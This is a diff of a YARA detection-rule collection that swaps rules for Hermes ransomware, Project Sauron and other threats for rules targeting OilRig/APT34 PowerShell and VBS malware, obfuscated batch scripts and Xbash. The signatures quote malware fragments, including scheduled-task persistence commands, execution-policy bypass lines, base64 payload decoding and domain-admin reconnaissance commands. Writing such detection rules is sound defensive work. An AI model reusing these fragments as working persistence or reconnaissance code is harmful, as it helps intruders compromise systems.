-		$s7 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
+		$s1 = "%userprofile%\\AppData\\Local\\Microsoft\\" ascii
+		$s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii
+		$s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii
+		$s4 = "') -replace '__',('DNS'+$id) | " fullword ascii
+		$s5 = "\\upd.vbs" ascii
+		$s6 = "schtasks /create /F /sc minute /mo " fullword ascii
+		$s7 = "') -replace '__',('HTP'+$id) | " fullword ascii
+		$s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii
+		$s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 2 of ( $s* ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Hermes2_1 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen3 : FILE
 {
 	meta:
-		description = "Detects Hermes Ransomware as used in BAE report on FEIB"
-		author = "BAE"
-		id = "13397a43-04e1-5cc1-9260-9895736013f3"
-		date = "2017-10-11"
-		modified = "2023-12-05"
-		reference = "https://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_hermes_ransom.yar#L1-L27"
+		description = "Detects Oilrig malware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1cd5f7ea-4ae6-5642-b8b3-050cfe724e69"
+		date = "2016-10-12"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L112-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b27881f59c8d8cc529fa80a58709db36"
-		logic_hash = "85a7b3ec89f2bf32e5520a7c5c84661383be71abd8dae3d072d75d5b1118db24"
+		logic_hash = "ccc110b04ea3ee9a19ff23babbc759b4ec6114f8b5eb4f42bc5f70f8abde8a53"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
+		hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
+		hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\"
-		$s2 = "0419"
-		$s3 = "0422"
-		$s4 = "0423"
-		$S1 = "HERMES"
-		$S2 = "vssadminn"
-		$S3 = "finish work"
-		$S4 = "testlib.dll"
-		$S5 = "shadowstorageiet"
-		$u1 = "ALKnvfoi4tbmiom3t40iomfr0i3t4jmvri3tb4mvi3btv3rgt4t777"
-		$u2 = "HERMES 2.1 TEST BUILD, press ok"
-		$u3 = "hnKwtMcOadHwnXutKHqPvpgfysFXfAFTcaDHNdCnktA"
+		$x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
+		$x2 = "\\Libraries\\fireueye.vbs" ascii
+		$x3 = "\\Libraries\\fireeye.vbs&" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 3 of ( $S* ) and 1 of ( $u* )
+		( uint16( 0 ) == 0xcfd0 and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Passwordstate_Moserware_Backdoor_Apr21_1 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal2 : FILE
 {
 	meta:
-		description = "Detects backdoor used in Passwordstate incident"
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "061de3ae-c404-5e4a-a16b-b3b208b1ae7f"
-		date = "2021-04-25"
+		id = "7a6c38e7-bed9-524b-b4a5-c6c895b9c049"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://thehackernews.com/2021/04/passwordstate-password-manager-update.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_passwordstate_backdoor.yar#L1-L24"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L131-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46bf5b7f4f75997535742021d1d5c2129daae0b3836c08383058e5e5b8e27d93"
+		logic_hash = "b1de7dc3c205c78825f52ea30608b10bafa2c486db53693aa90aa07138fb1a87"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c2169ab4a39220d21709964d57e2eafe4b68c115061cbb64507cfbbddbe635c6"
-		hash2 = "f23f9c2aaf94147b2c5d4b39b56514cd67102d3293bdef85101e2c05ee1c3bf9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
 
 	strings:
-		$x1 = "https://passwordstate-18ed2.kxcdn.com" wide
-		$s1 = " ProxyUserName, ProxyPassword FROM [SystemSettings]" wide fullword
-		$s2 = "PasswordstateService.Passwordstate.Crypto" wide
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari" wide fullword
-		$op1 = { 00 4c 00 4e 00 43 00 4c 00 49 00 31 00 31 00 3b 00 00 17 }
-		$op2 = { 4c 00 49 00 31 00 31 00 3b 00 00 17 50 00 72 00 }
-		$op3 = { 61 00 74 00 65 00 2d 00 31 00 38 00 65 00 64 00 32 00 2e 00 6b 00 78 00 }
+		$x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
+		$x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+		$x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide
+		$x4 = "mailto:Tarik.Imam@gartner.com" fullword wide
+		$x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii
+		$x6 = "2dy53My5vcmcvMjAw" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_OSX_Backdoor_Bella : FILE
+rule SIGNATURE_BASE_Oilrig_Campaign_Reconnaissance : FILE
 {
 	meta:
-		description = "Bella MacOS/OSX backdoor"
-		author = "John Lambert @JohnLaTwC"
-		id = "d2a994f9-acff-5de4-8f70-453b5d4d7947"
-		date = "2018-02-23"
+		description = "Detects Windows discovery commands - known from OilRig Campaign"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4fe24b8-290a-5a4a-9f81-bbbd9aae6c6e"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JohnLaTwC/status/911998777182924801"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_backdoor_bella.yar#L2-L42"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L151-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
-		logic_hash = "c2fa72072decd850698fbaaa9c2a6687cdf64e6bac068ff52a97963053db4339"
+		logic_hash = "04c9f482c0c4abc1bf316459dc3085154defadb0fd5fe74ff274d8b3ee807b7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
 
 	strings:
-		$h1 = "#!/usr/bin/env"
-		$s0 = "subprocess" fullword ascii
-		$s1 = "import sys" fullword ascii
-		$s2 = "shutil" fullword ascii
-		$p0 = "create_bella_helpers" fullword ascii
-		$p1 = "is_there_SUID_shell" fullword ascii
-		$p2 = "BELLA IS NOW RUNNING" fullword ascii
-		$p3 = "SELECT * FROM bella WHERE id" fullword ascii
-		$subpart1_a = "inject_payloads" fullword ascii
-		$subpart1_b = "check_if_payloads" fullword ascii
-		$subpart1_c = "updateDB" fullword ascii
-		$subpart2_a = "appleIDPhishHelp" fullword ascii
-		$subpart2_b = "appleIDPhish" fullword ascii
-		$subpart2_c = "iTunes" fullword ascii
+		$s1 = "whoami & hostname & ipconfig /all" ascii
+		$s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
+		$s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
 
 	condition:
-		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and @s0 [ 1 ] < 100 and @s1 [ 1 ] < 100 and @s2 [ 1 ] < 100 and 1 of ( $p* ) or all of ( $subpart1_* ) or all of ( $subpart2_* )
+		( filesize < 1KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Scripts
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal3 : FILE
 {
 	meta:
-		description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "575a6f1b-5a4d-5f81-b44a-b7025dbec2a5"
-		date = "2016-08-08"
+		id = "e5967b39-5d21-5a6a-a1b5-2ec122f16444"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L1-L25"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L168-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "275ec8de40ae973b4ec4c891c56a70fc2fd05abff258b8015d986d0106506367"
+		logic_hash = "62a6f6c4e574a3c577f0b1fdd85eaa3e775a7ae0e457c59a6b6f741ad895e510"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
 
 	strings:
-		$x1 = "local t = w.exec2str(\"regedit "
-		$x2 = "local r = w.exec2str(\"cat"
-		$x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
-		$x4 = "move O FakeVirtualEncryptedNetwork.dll"
-		$x5 = "sinfo | basex b 32url | dext l 30"
-		$x6 = "w.exec2str(execStr)"
-		$x7 = "netnfo irc | basex b 32url"
-		$x8 = "w.exec(\"wfw status\")"
-		$x9 = "exec(\"samdump\")"
-		$x10 = "cat VirtualEncryptedNetwork.ini|grep"
-		$x11 = "if string.lower(k) == \"securityproviders\" then"
-		$x12 = "exec2str(\"plist b | grep netsvcs\")"
-		$x14 = "SAURON_KBLOG_KEY ="
+		$x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii
+		$x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii
+		$x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii
 
 	condition:
-		1 of them
+		( filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_Dsniff
+
+rule SIGNATURE_BASE_Oilrig_Malware_Nov17_13 : FILE
 {
 	meta:
-		description = "Detects Dsniff hack tool"
+		description = ""
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb39185b-330f-5b93-ac58-0465e5767919"
-		date = "2019-02-19"
+		id = "c45b8d30-6a5f-5dac-a202-6748ba7b7bd2"
+		date = "2017-11-22"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L27-L39"
+		reference = "https://twitter.com/ClearskySec/status/933280188733018113"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L185-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0edd3ba7e78ee2810aa3c7643a96382c1fe0b5e627913a5a9bac2e83c8d40274"
-		score = 55
+		logic_hash = "eab15229f084681b27cec7ed959ef4cd1193a0b38aaed4341dcd6761e2505804"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f1e2df85c538875a7da877719555e21c33a558ac121eb715cf4e779d77ab445"
 
 	strings:
-		$x1 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
+		$x1 = "\\Release\\dnscat2.pdb" ascii
+		$x2 = "cscript.exe //T:20 //Nologo " fullword ascii
+		$a1 = "taskkill /F /IM cscript.exe" fullword ascii
+		$a2 = "cmd.exe /c " fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "0160250adfc97f9d4a12dd067323ec61" or 1 of ( $x* ) or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Arping_Module
+rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager_Macro : FILE
 {
 	meta:
-		description = "Detects strings from arping module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42389511-de92-57cb-9dee-9f829fd5e55a"
-		date = "2016-08-08"
+		description = "Detects OilRig malware"
+		author = "Eyal Sela (slightly modified by Florian Roth)"
+		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L41-L55"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L208-L233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d87e91441994c4ed863596d79c108c9f72adfb708f885cb63a881eb25aa089b7"
+		logic_hash = "35e540b87bb7425b601fad76f0ff33c60a4d91579fc50f5902d708d06fa755f6"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "Resolve hosts that answer"
-		$s2 = "Print only replying Ips"
-		$s3 = "Do not display MAC addresses"
+		$one1 = "$c$m$$d$.$$" ascii wide
+		$one2 = "$C$$e$r$$t$u$$t$i$$l$" ascii wide
+		$one3 = "$$%$a$$p$p$$d$a$" ascii wide
+		$one4 = ".$t$$x$t$$" ascii wide
+		$one5 = "cu = Replace(cu, \"$\", \"\")" ascii wide
+		$one6 = "Shell Environ$(\"COMSPEC\") & \" /c"
+		$one7 = "echo \" & Chr(32) & cmd & Chr(32) & \" > \" & Chr(34)" ascii wide
+		$two1 = "& SchTasks /Delete /F /TN " ascii wide
+		$two2 = "SecurityAssist" ascii wide
+		$two3 = "vbs = \"cmd.exe /c SchTasks" ascii wide
+		$two4 = "/Delete /F /TN Conhost & del" ascii wide
+		$two5 = "NullRefrencedException" ascii wide
+		$two6 = "error has occurred in user32.dll by" ascii wide
+		$two7 = "NullRefrencedException" ascii wide
 
 	condition:
-		all of them
+		filesize < 300KB and 1 of ( $one* ) or 2 of ( $two* )
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Kblogi_Module
+rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager : FILE
 {
 	meta:
-		description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e1dd4d1a-1089-5897-8f4a-52c7068802fa"
-		date = "2016-08-08"
+		description = "Detects OilRig malware"
+		author = "Eyal Sela"
+		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L57-L71"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L235-L255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bba87b17a62fc968e89d4f6d10de06875c6b7f47c8bb7ae3f7932804b23a8e87"
+		logic_hash = "97debd5e74730e22133f29c89a0cf049862459c24d1b46634a973908040db3a7"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$x1 = "Inject using process name or pid. Default"
-		$s2 = "Convert mode: Read log from file and convert to text"
-		$s3 = "Maximum running time in seconds"
+		$one1 = "srvResesponded" ascii wide fullword
+		$one2 = "InetlSecurityAssistManager" ascii wide fullword
+		$one3 = "srvCheckresponded" ascii wide fullword
+		$one4 = "IntelSecurityManager" ascii wide
+		$one5 = "msoffice365cdn.com" ascii wide
+		$one6 = "\\tmpCa.vbs" ascii wide
+		$one7 = "AAZFinish" ascii wide fullword
+		$one8 = "AAZUploaded" ascii wide fullword
+		$one9 = "ABZFinish" ascii wide fullword
+		$one10 = "\\tmpCa.vbs" ascii wide
 
 	condition:
-		$x1 or 2 of them
+		filesize < 300KB and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Basex_Module
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_1
 {
 	meta:
-		description = "Detects strings from basex module - Project Sauron report by Kaspersky"
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51ef3826-af5c-562b-a1f8-3bf11532ac2d"
-		date = "2016-08-08"
+		id = "6a082c5a-ee5b-5002-9148-61bbcfedfe68"
+		date = "2019-04-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L73-L87"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L267-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "90cfb58017d62312c56908aca1a48bb7425f5cd51540298ecf65305b46ffb2c8"
+		logic_hash = "afe203fdfcc9dcafb170bee972d45e66e5483a777112a00fa30516dfe81bbf88"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
 
 	strings:
-		$x1 = "64, 64url, 32, 32url or 16."
-		$s2 = "Force decoding when input is invalid/corrupt"
-		$s3 = "This cruft"
+		$x1 = "= get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" ascii
+		$x2 = "Write-Host \"excepton occured!\"" ascii
+		$s1 = "Start-Sleep -s 1;" fullword ascii
+		$s2 = "Start-Sleep -m 100;" fullword ascii
 
 	condition:
-		$x1 or 2 of them
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Dext_Module
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_2
 {
 	meta:
-		description = "Detects strings from dext module - Project Sauron report by Kaspersky"
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d69373e0-d6ad-5475-8766-06e865620ed8"
-		date = "2016-08-08"
+		id = "c3bdadfd-2164-5e33-be84-d5d5de8eb048"
+		date = "2019-04-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L89-L104"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L285-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7dbfb3ddfffa6fa65800e07fdcc527650474740afa658567efe46830587cedae"
+		logic_hash = "57c8f02ebfb05f739fc4791a88be4a981ce7b89e2bd283669f85aae1a5c14d02"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"
 
 	strings:
-		$x1 = "Assemble rows of DNS names back to a single string of data"
-		$x2 = "removes checks of DNS names and lengths (during split)"
-		$x3 = "Randomize data lengths (length/2 to length)"
-		$x4 = "This cruft"
+		$x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii
+		$x2 = "$t = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" fullword ascii
+		$x3 = "| Where { $_ -notmatch '^\\s+$' }" ascii
+		$s1 = "= new-object System.Net.WebProxy($u, $true);" fullword ascii
+		$s2 = " -eq \"dom\"){$" ascii
+		$s3 = " -eq \"srv\"){$" ascii
+		$s4 = "+\"<>\" | Set-Content" ascii
 
 	condition:
-		2 of them
+		1 of ( $x* ) and 3 of them
 }
-rule SIGNATURE_BASE_Hacktool_This_Cruft : FILE
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_3
 {
 	meta:
-		description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a39de541-19b5-5b7e-a3dc-51a5309181e5"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L106-L119"
+		id = "361582e7-94e3-5608-9ba9-31fa20c37cf0"
+		date = "2019-04-17"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L306-L326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "875c34e8048c3f98afc97683d0b3086c3396753cd9fb14bc68681c63ed77fd51"
-		score = 60
+		logic_hash = "77ba71a59d6026c4b393bc66af586066e11b0c496367a38d847396a23b3dffbe"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"
 
 	strings:
-		$x1 = "This cruft" fullword
+		$x1 = "Powershell.exe -exec bypass -file ${global:$address1}"
+		$x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn"
+		$x3 = "\"\\UpdateTasks\\UpdateTaskHosts\""
+		$x4 = "wscript /b \\`\"${global:$address1" ascii
+		$x5 = "::FromBase64String([string]${global:$http_ag}))" ascii
+		$x6 = ".run command1, 0, false\" | Out-File " ascii
+		$x7 = "\\UpdateTask.vbs" ascii
+		$x8 = "hUpdater.ps1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M1 : FILE
+rule SIGNATURE_BASE_MAL_CMD_Script_Obfuscated_Feb19_1 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Detects obfuscated batch script using env variable sub-strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c741bd7d-1885-55f1-a5b3-8f00fda2fe39"
-		date = "2016-08-09"
+		id = "8cc99ff5-968c-5b12-9aac-72279c1b8a6b"
+		date = "2019-03-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L130-L148"
+		reference = "https://twitter.com/DbgShell/status/1101076457189793793"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cmd_script_obfuscated.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c81c996e487bdd840111513724ccf1220ee3bd8280d776aa4c128ef5263ee136"
+		logic_hash = "71c8831686796c921674ec293b5bdf2c42ae9069b258c85c9e0ca6a7f972daf8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"
+		hash1 = "deed88c554c8f9bef4078e9f0c85323c645a52052671b94de039b438a8cff382"
 
 	strings:
-		$s1 = "ncnfloc.dll" fullword wide
-		$s4 = "Network Configuration Locator" fullword wide
-		$op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
-		$op1 = { 80 75 29 85 c9 79 25 b9 01 }
-		$op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 }
+		$h1 = { 40 65 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 }
+		$s1 = { 2C 31 25 0D 0A 65 63 68 6F 20 25 25 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x6540 and filesize < 200KB and $h1 at 0 and uint16( filesize -3 ) == 0x0d25 and uint8( filesize -1 ) == 0x0a and $s1 in ( filesize -200 .. filesize )
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M2 : FILE
+rule SIGNATURE_BASE_MAL_Xbash_PY_Sep18 : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
+		description = "Detects Xbash malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79abe5f2-a750-5018-a67f-6ee1c51a2ca1"
-		date = "2016-08-09"
+		id = "97512fe8-002f-5cbc-a915-d55c087fbef7"
+		date = "2018-09-18"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L150-L167"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_xbash.yar#L13-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57099a802ee62a5183156f0b30713553b6fd83bbb5e1b453e9b25da0109b8777"
+		logic_hash = "d686c42e6bf440507735f846463f2df5fbf4f7bd5f5656883655a5278a1fc252"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"
